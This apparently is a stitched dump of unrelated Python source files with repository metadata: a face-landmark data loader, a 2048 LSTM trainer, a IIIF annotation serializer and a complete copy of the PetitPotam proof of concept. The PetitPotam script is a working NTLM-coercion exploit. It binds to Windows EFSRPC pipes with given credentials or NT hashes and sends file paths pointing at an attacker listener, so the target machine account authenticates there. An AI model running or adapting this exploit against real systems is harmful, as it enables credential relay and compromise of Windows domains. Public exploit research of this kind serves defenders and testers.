coef = nd.array([[[0.299, 0.587, 0.114]]])
alpha = np.random.uniform(-saturation, saturation)
gray = img * coef
gray = np.sum(gray, axis=2, keepdims=True)
img = alpha * img + (1.0 - alpha) * gray
img = np.clip(img, 0, 255).astype(np.uint8)
return img, annotation
def random_hue(image, annotation, hue=0.5):
h = int(np.random.uniform(-hue, hue) * 180)
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
hsv[:, :, 0] = (hsv[:, :, 0].astype(int) + h) % 180
image = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return image, annotation
def scale(img, annotation):
f_xy = np.random.uniform(-0.4, 0.8)
origin_h, origin_w = img.shape[:2]
bbox = annotation[0:4]
landmark_x = annotation[4::2]
landmark_y = annotation[4 + 1::2]
h, w = int(origin_h * f_xy), int(origin_w * f_xy)
image = resize(img, (h, w), preserve_range=True, anti_aliasing=True, mode='constant').astype(np.uint8)
new_annotation = list()
for i in range(len(bbox)):
bbox[i] = bbox[i] * f_xy
new_annotation.append(bbox[i])
for i in range(len(landmark_x)):
landmark_x[i] = landmark_x[i] * f_xy
landmark_y[i] = landmark_y[i] * f_xy
new_annotation.append(landmark_x[i])
new_annotation.append(landmark_y[i])
return image, new_annotation
def rotate(img, annotation, alpha=30):
bbox = annotation[0:4]
landmark_x = annotation[4::2]
landmark_y = annotation[4 + 1::2]
center = ((bbox[0] + bbox[2]) / 2, (bbox[1] + bbox[3]) / 2)
rot_mat = cv2.getRotationMatrix2D(center, alpha, 1)
img_rotated_by_alpha = cv2.warpAffine(img, rot_mat, (img.shape[1], img.shape[0]))
point_x = [bbox[0], bbox[2], bbox[0], bbox[2]]
point_y = [bbox[1], bbox[3], bbox[3], bbox[1]]
new_point_x = list()
new_point_y = list()
for (x, y) in zip(landmark_x, landmark_y):
new_point_x.append(rot_mat[0][0] * x + rot_mat[0][1] * y + rot_mat[0][2])
new_point_y.append(rot_mat[1][0] * x + rot_mat[1][1] * y + rot_mat[1][2])
new_annotation = list()
new_annotation.append(min(new_point_x))
new_annotation.append(min(new_point_y))
new_annotation.append(max(new_point_x))
new_annotation.append(max(new_point_y))
for (x, y) in zip(landmark_x, landmark_y):
new_annotation.append(rot_mat[0][0] * x + rot_mat[0][1] * y + rot_mat[0][2])
new_annotation.append(rot_mat[1][0] * x + rot_mat[1][1] * y + rot_mat[1][2])
return img_rotated_by_alpha, new_annotation
def generate_FT(image):
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
f = np.fft.fft2(image)
fshift = np.fft.fftshift(f)
fimg = np.log(np.abs(fshift) + 1)
maxx = -1
minn = 100000
for i in range(len(fimg)):
if maxx < max(fimg[i]):
maxx = max(fimg[i])
if minn > min(fimg[i]):
minn = min(fimg[i])
fimg = (fimg - minn + 1) / (maxx - minn + 1)
return fimg
def draw_labelmap(img, pt, sigma=1, type='Gaussian'):
# Draw a 2D gaussian
# Adopted from https://github.com/anewell/pose-hg-train/blob/master/src/pypose/draw.py
# Check that any part of the gaussian is in-bounds
ul = [int(int(pt[0]) - 3 * sigma), int(int(pt[1]) - 3 * sigma)]
br = [int(int(pt[0]) + 3 * sigma + 1), int(int(pt[1]) + 3 * sigma + 1)]
if (ul[0] >= img.shape[1] or ul[1] >= img.shape[0] or
br[0] < 0 or br[1] < 0):
# If not, just return the image as is
return to_torch(img)
# Generate gaussian
size = 6 * sigma + 1
x = np.arange(0, size, 1, float)
y = x[:, np.newaxis]
x0 = y0 = size // 2
# The gaussian is not normalized, we want the center value to equal 1
if type == 'Gaussian':
g = np.exp(- ((x - x0) ** 2 + (y - y0) ** 2) / (2 * sigma ** 2))
elif type == 'Cauchy':
g = sigma / (((x - x0) ** 2 + (y - y0) ** 2 + sigma ** 2) ** 1.5)
# Usable gaussian range
g_x = max(0, -ul[0]), min(br[0], img.shape[1]) - ul[0]
g_y = max(0, -ul[1]), min(br[1], img.shape[0]) - ul[1]
# Image range
img_x = max(0, ul[0]), min(br[0], img.shape[1])
img_y = max(0, ul[1]), min(br[1], img.shape[0])
img[img_y[0]:img_y[1], img_x[0]:img_x[1]] = g[g_y[0]:g_y[1], g_x[0]:g_x[1]]
return img
class WLFWDatasets(data.Dataset):
def __init__(self, file_list, transforms=None):
self.line = None
self.lm_number = 98
self.img_size = 96
self.ft_size = self.img_size // 2
self.hm_size = self.img_size // 2
self.transforms = transforms
with open(file_list, 'r') as f:
self.lines = f.readlines()
def __getitem__(self, index):
self.line = self.lines[index].strip()
jpg_idx = self.line.find('png')
line_data = [self.line[:jpg_idx + 3]]
line_data.extend(self.line[jpg_idx + 4:].split())
self.line = line_data
self.img = cv2.imread(self.line[0])
# generate ft
# self.ft_img = generate_FT(self.img)
# self.ft_img = cv2.resize(self.ft_img, (self.ft_size, self.ft_size))
# self.ft_img = torch.from_numpy(self.ft_img).float()
# self.ft_img = torch.unsqueeze(self.ft_img, 0)
self.landmark = np.asarray(self.line[1:197], dtype=np.float32)
# generate heatmap
# self.heatmaps = np.zeros((self.lm_number, self.img_size, self.img_size))
# for idx in range(self.lm_number):
# self.heatmaps[idx, :, :] = draw_labelmap(self.heatmaps[idx, :, :], (self.landmark[idx * 2] * self.img_size, self.landmark[idx * 2 + 1] * self.img_size))
# self.heatmap = cv2.resize(self.heatmap, (self.hm_size, self.hm_size))
# self.heatmap = (self.heatmap * 255).astype(np.uint8)
# with open("heatmap.txt", "w") as f:
# for i in range(self.hm_size):
# str_ = ','.join(str(s) for s in self.heatmap[i, :])
# f.write(str_ + '\n')
# cv2.imwrite('heatmap.jpg', self.heatmap)
if self.transforms:
self.img = self.transforms(self.img)
return self.img, self.landmark
def __len__(self):
return len(self.lines)
if __name__ == '__main__':
file_list = './data/test_data/list.txt'
wlfwdataset = WLFWDatasets(file_list)
dataloader = DataLoader(wlfwdataset, batch_size=256, shuffle=True, num_workers=0, drop_last=False)
for img, landmark, attribute, euler_angle in dataloader:
print("img shape", img.shape)
print("landmark size", landmark.size())
print("attrbute size", attribute)
print("euler_angle", euler_angle.size())
| 0
| 0
| 0
| 1,868
| 0
| 5,836
| 0
| -16
| 365
|
30737425867bb55a2af14436ac1b6d6839ca34e3
| 16,368
|
py
|
Python
|
modules/exploit/use/petitpotam.py
|
astar-security/MaeGeri
|
b28b37fe1cb8c4f650b8a4c9019636c540262fda
|
[
"Apache-2.0"
] | null | null | null |
modules/exploit/use/petitpotam.py
|
astar-security/MaeGeri
|
b28b37fe1cb8c4f650b8a4c9019636c540262fda
|
[
"Apache-2.0"
] | null | null | null |
modules/exploit/use/petitpotam.py
|
astar-security/MaeGeri
|
b28b37fe1cb8c4f650b8a4c9019636c540262fda
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Author: GILLES Lionel aka topotam (@topotam77)
#
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from dementor.py from @3xocyte ;)
show_banner = '''
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
'''
################################################################################
# STRUCTURES
################################################################################
################################################################################
# RPC CALLS
################################################################################
#class EfsRpcQueryProtectors(NDRCALL):
# opnum = 21
# structure = (
# ('FileName', WSTR),
# ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
# )
#class EfsRpcQueryProtectorsResponse(NDRCALL):
# structure = (
# ('ErrorCode', ULONG),
# )
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
0 : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
4 : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
5 : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
6 : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
7 : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
8 : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
9 : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
# 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
}
if __name__ == '__main__':
main()
| 36.454343
| 243
| 0.574047
|
#!/usr/bin/env python
#
# Author: GILLES Lionel aka topotam (@topotam77)
#
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from dementor.py from @3xocyte ;)
import sys
import argparse
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin
show_banner = '''
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
'''
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__( self ):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return 'EFSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
else:
return 'EFSR SessionError: unknown error code: 0x%x' % self.error_code
################################################################################
# STRUCTURES
################################################################################
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
align = 1
structure = (
('Data', '20s'),
)
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
align = 1
structure = (
('Data', '20s'),
)
class EFS_EXIM_PIPE(NDRSTRUCT):
align = 1
structure = (
('Data', ':'),
)
class EFS_HASH_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
structure = (
('Type', DWORD),
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
structure = (
('Lenght', DWORD),
('SID', RPC_SID),
('Hash', EFS_HASH_BLOB),
('Display', LPWSTR),
)
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
structure = (
('Lenght', DWORD),
('SID', RPC_SID),
('Hash', EFS_CERTIFICATE_BLOB),
)
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
align = 1
structure = (
('Cert', DWORD),
('Users', ENCRYPTION_CERTIFICATE_HASH),
)
class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
structure = (
('Type', DWORD),
('HASH', ENCRYPTION_CERTIFICATE_HASH_LIST),
('Certif', ENCRYPTION_CERTIFICATE),
('Blob', EFS_RPC_BLOB),
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
align = 1
structure = (
('Data', ':'),
)
################################################################################
# RPC CALLS
################################################################################
class EfsRpcOpenFileRaw(NDRCALL):
opnum = 0
structure = (
('fileName', WSTR),
('Flag', ULONG),
)
class EfsRpcOpenFileRawResponse(NDRCALL):
structure = (
('hContext', EXIMPORT_CONTEXT_HANDLE),
('ErrorCode', ULONG),
)
class EfsRpcEncryptFileSrv(NDRCALL):
opnum = 4
structure = (
('FileName', WSTR),
)
class EfsRpcEncryptFileSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcDecryptFileSrv(NDRCALL):
opnum = 5
structure = (
('FileName', WSTR),
('Flag', ULONG),
)
class EfsRpcDecryptFileSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcQueryUsersOnFile(NDRCALL):
opnum = 6
structure = (
('FileName', WSTR),
)
class EfsRpcQueryUsersOnFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcQueryRecoveryAgents(NDRCALL):
opnum = 7
structure = (
('FileName', WSTR),
)
class EfsRpcQueryRecoveryAgentsResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcRemoveUsersFromFile(NDRCALL):
opnum = 8
structure = (
('FileName', WSTR),
('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)
)
class EfsRpcRemoveUsersFromFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcAddUsersToFile(NDRCALL):
opnum = 9
structure = (
('FileName', WSTR),
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)
)
class EfsRpcAddUsersToFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcFileKeyInfo(NDRCALL):
opnum = 12
structure = (
('FileName', WSTR),
('infoClass', DWORD),
)
class EfsRpcFileKeyInfoResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
opnum = 13
structure = (
('SrcFileName', WSTR),
('DestFileName', WSTR),
('dwCreationDisposition', DWORD),
('dwAttributes', DWORD),
('RelativeSD', EFS_RPC_BLOB),
('bInheritHandle', BOOL),
)
class EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcAddUsersToFileEx(NDRCALL):
opnum = 15
structure = (
('dwFlags', DWORD),
('Reserved', EFS_RPC_BLOB),
('FileName', WSTR),
('dwAttributes', DWORD),
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),
)
class EfsRpcAddUsersToFileExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcFileKeyInfoEx(NDRCALL):
opnum = 16
structure = (
('dwFileKeyInfoFlags', DWORD),
('Reserved', EFS_RPC_BLOB),
('FileName', WSTR),
('InfoClass', DWORD),
)
class EfsRpcFileKeyInfoExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcGetEncryptedFileMetadata(NDRCALL):
opnum = 18
structure = (
('FileName', WSTR),
)
class EfsRpcGetEncryptedFileMetadataResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcSetEncryptedFileMetadata(NDRCALL):
opnum = 19
structure = (
('FileName', WSTR),
('OldEfsStreamBlob', EFS_RPC_BLOB),
('NewEfsStreamBlob', EFS_RPC_BLOB),
('NewEfsSignature', ENCRYPTED_FILE_METADATA_SIGNATURE),
)
class EfsRpcSetEncryptedFileMetadataResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcEncryptFileExSrv(NDRCALL):
opnum = 21
structure = (
('FileName', WSTR),
('ProtectorDescriptor', WSTR),
('Flags', ULONG),
)
class EfsRpcEncryptFileExSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
#class EfsRpcQueryProtectors(NDRCALL):
# opnum = 21
# structure = (
# ('FileName', WSTR),
# ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
# )
#class EfsRpcQueryProtectorsResponse(NDRCALL):
# structure = (
# ('ErrorCode', ULONG),
# )
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
0 : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
4 : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
5 : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
6 : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
7 : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
8 : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
9 : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
# 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
}
class CoerceAuth():
def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost, targetIp):
binding_params = {
'lsarpc': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'efsr': {
'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
},
'samr': {
'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'lsass': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'netlogon': {
'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
}
rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
if doKerberos:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
if targetIp:
rpctransport.setRemoteHost(targetIp)
dce = rpctransport.get_dce_rpc()
#dce.set_auth_type(RPC_C_AUTHN_WINNT)
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
print("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
try:
dce.connect()
except Exception as e:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
print("[+] Connected!")
print("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
except Exception as e:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
print("[+] Successfully bound!")
return dce
def EfsRpcOpenFileRaw(self, dce, listener):
print("[-] Sending EfsRpcOpenFileRaw!")
try:
request = EfsRpcOpenFileRaw()
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
request['Flag'] = 0
#request.dump()
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
print('[+] Attack worked!')
sys.exit()
if str(e).find('rpc_s_access_denied') >= 0:
print('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
print('[+] OK! Using unpatched function!')
print("[-] Sending EfsRpcEncryptFileSrv!")
try:
request = EfsRpcEncryptFileSrv()
request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
print('[+] Attack worked!')
pass
else:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
else:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
def main():
parser = argparse.ArgumentParser(add_help = True, description = "PetitPotam - rough PoC to connect to lsarpc and elicit machine account authentication via MS-EFSRPC EfsRpcOpenFileRaw()")
parser.add_argument('-u', '--username', action="store", default='', help='valid username')
parser.add_argument('-p', '--password', action="store", default='', help='valid password (if omitted, it will be asked unless -no-pass)')
parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
parser.add_argument('-hashes', action="store", metavar="[LMHASH]:NTHASH", help='NT/LM hashes (LM hash can be empty)')
parser.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
parser.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
parser.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it')
parser.add_argument('-pipe', action="store", choices=['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass'], default='lsarpc', help='Named pipe to use (default: lsarpc)')
parser.add_argument('listener', help='ip address or hostname of listener')
parser.add_argument('target', help='ip address or hostname of target')
options = parser.parse_args()
if options.hashes is not None:
lmhash, nthash = options.hashes.split(':')
else:
lmhash = ''
nthash = ''
print(show_banner)
if options.password == '' and options.username != '' and options.hashes is None and options.no_pass is not True:
from getpass import getpass
options.password = getpass("Password:")
plop = CoerceAuth()
dce = plop.connect(username=options.username, password=options.password, domain=options.domain, lmhash=lmhash, nthash=nthash, target=options.target, pipe=options.pipe, doKerberos=options.k, dcHost=options.dc_ip, targetIp=options.target_ip)
plop.EfsRpcOpenFileRaw(dce, options.listener)
dce.disconnect()
sys.exit()
if __name__ == '__main__':
main()
| 0
| 0
| 0
| 9,176
| 0
| 2,669
| 0
| 181
| 1,175
|
2d3ca8371c21a92681fe90abff723c44bebc3c0d
| 3,045
|
py
|
Python
|
game2048/RNN_training.py
|
fuuuyuuu/2048-api
|
d96aa0bc7099e8ce7b792ec2b1051a44b4325eec
|
[
"Apache-2.0"
] | null | null | null |
game2048/RNN_training.py
|
fuuuyuuu/2048-api
|
d96aa0bc7099e8ce7b792ec2b1051a44b4325eec
|
[
"Apache-2.0"
] | null | null | null |
game2048/RNN_training.py
|
fuuuyuuu/2048-api
|
d96aa0bc7099e8ce7b792ec2b1051a44b4325eec
|
[
"Apache-2.0"
] | null | null | null |
import torchvision.transforms as transforms
# torch.manual_seed(1) # reproducible
# Hyper Parameters
EPOCH = 20 # train the training data n times, to save time, we just train 1 epoch
BATCH_SIZE = 6400
TIME_STEP = 4 # rnn time step / image height
INPUT_SIZE = 4 # rnn input size / image width
global LR;
LR = 0.001 # learning rate\
if __name__ == '__main__':
main()
| 31.71875
| 110
| 0.587521
|
import torch
from torch import nn
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
from data_loader import data_load
from torch.autograd import Variable
import numpy as np
# torch.manual_seed(1) # reproducible
# Hyper Parameters
EPOCH = 20 # train the training data n times, to save time, we just train 1 epoch
BATCH_SIZE = 6400
TIME_STEP = 4 # rnn time step / image height
INPUT_SIZE = 4 # rnn input size / image width
global LR;
LR = 0.001 # learning rate\
def DataLoad():
# board_data loading with a batche size
train_data = data_load(data_root = 'Train.csv', data_tensor = transforms.Compose([transforms.ToTensor()]))
X_train = torch.utils.data.DataLoader(train_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=0)
# test_data = data_load(data_root='Test.csv', data_tensor=transforms.Compose([transforms.ToTensor()]))
# X_test = torch.utils.data.DataLoader(test_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=0)
return X_train
class RNN(nn.Module):
def __init__(self):
super(RNN, self).__init__()
self.my_rnn = nn.LSTM(
input_size=INPUT_SIZE,
hidden_size=512,
num_layers=4,
batch_first=True
)
self.out = nn.Linear(512, 4)
def forward(self, x):
r_out, (h_n, h_c) = self.my_rnn(x,None)
out = self.out(r_out[:, -1 ,:])
return out
def main():
global LR;
rnn_training = RNN()
train_data = DataLoad()
optimizer = torch.optim.Adam(rnn_training.parameters(), lr=LR)
loss_func = nn.CrossEntropyLoss()
for epoch in range(EPOCH):
if epoch == 10:
LR = 0.0001
optimizer = torch.optim.Adam(rnn_training.parameters(), lr=LR)
for step, (train, target) in enumerate(train_data):
target = target.long();
b_x = Variable(train.view(-1,4,4))
# print(b_x.shape)
b_y = Variable(target)
if torch.cuda.is_available():
b_x = Variable(b_x).cuda()
b_y = b_y.cuda()
rnn_training = rnn_training.cuda()
optimizer.zero_grad()
output = rnn_training(b_x)
loss = loss_func(output, b_y)
loss.backward()
optimizer.step()
if step % 50 == 0:
train_output = output # (samples, time_step, input_size)
# pred_y = torch.max(train_output, 1)[1].data
pred_y = train_output.data.max(1)[1]
# print(type(pred_y), type(target))
num = (pred_y.eq(b_y.data).sum())
accuracy = 100*num / 6400
print('Epoch: ', epoch, '| train loss: %.4f' % loss, '| test accuracy: %.2f' % accuracy)
torch.save(rnn_training,'rnn_model_b'+str(epoch)+'.pkl')
torch.save(rnn_training, 'rnn_model_final.pkl')
if __name__ == '__main__':
main()
| 0
| 0
| 0
| 394
| 0
| 2,003
| 0
| 23
| 201
|
ce512afce118edf2c22282a539009707e00c705b
| 1,877
|
py
|
Python
|
apps/iiif/serializers/annotation_list.py
|
ecds/readux
|
4eac8b48efef8126f4f2be28b5eb943c85a89c2e
|
[
"Apache-2.0"
] | 18
|
2017-06-12T09:58:02.000Z
|
2021-10-01T11:14:34.000Z
|
apps/iiif/serializers/annotation_list.py
|
ecds/readux
|
4eac8b48efef8126f4f2be28b5eb943c85a89c2e
|
[
"Apache-2.0"
] | 276
|
2019-04-26T20:13:01.000Z
|
2022-03-31T10:26:28.000Z
|
apps/iiif/serializers/annotation_list.py
|
ecds/readux
|
4eac8b48efef8126f4f2be28b5eb943c85a89c2e
|
[
"Apache-2.0"
] | 7
|
2018-03-13T23:44:26.000Z
|
2021-09-15T17:54:55.000Z
|
# pylint: disable = attribute-defined-outside-init, too-few-public-methods
"""Module for serializing IIIF Annotation Lists"""
from django.contrib.auth import get_user_model
USER = get_user_model()
| 36.096154
| 90
| 0.583378
|
# pylint: disable = attribute-defined-outside-init, too-few-public-methods
"""Module for serializing IIIF Annotation Lists"""
import json
from django.core.serializers import serialize
from django.core.serializers.base import SerializerDoesNotExist
from .base import Serializer as JSONSerializer
from django.contrib.auth import get_user_model
from django.db.models import Q
import config.settings.local as settings
USER = get_user_model()
class Serializer(JSONSerializer):
"""
IIIF V2 Annotation List https://iiif.io/api/presentation/2.1/#annotation-list
"""
def _init_options(self):
super()._init_options()
self.owners = self.json_kwargs.pop('owners', 0)
def get_dump_object(self, obj):
# TODO: Add more validation checks before trying to serialize.
if self.version == 'v2' or self.version is None:
data = {
"@context": "http://iiif.io/api/presentation/2/context.json",
"@id": '{h}/iiif/v2/{m}/list/{c}'.format(
h=settings.HOSTNAME,
m=obj.manifest.pid,
c=obj.pid
),
"@type": "sc:AnnotationList",
"resources": json.loads(
serialize(
'annotation',
obj.annotation_set.filter(
Q(owner=USER.objects.get(username='ocr')) |
Q(owner__in=self.owners)
),
is_list=True)
)
}
return data
return None
class Deserializer:
"""Deserialize IIIF Annotation List
:raises SerializerDoesNotExist: Not yet implemented.
"""
def __init__(self, *args, **kwargs):
raise SerializerDoesNotExist("annotation_list is a serialization-only serializer")
| 0
| 0
| 0
| 1,392
| 0
| 0
| 0
| 109
| 178
|
6ace6f1e7b2b5d4ff7aa95d88b4bbe251e459eca
| 575
|
py
|
Python
|
FOMMS_integrate/stochastic.py
|
nschieber/FOMMS_integrate
|
87456d476ecee45b8a06782da12baa1ce4c08e88
|
[
"BSD-3-Clause"
] | null | null | null |
FOMMS_integrate/stochastic.py
|
nschieber/FOMMS_integrate
|
87456d476ecee45b8a06782da12baa1ce4c08e88
|
[
"BSD-3-Clause"
] | null | null | null |
FOMMS_integrate/stochastic.py
|
nschieber/FOMMS_integrate
|
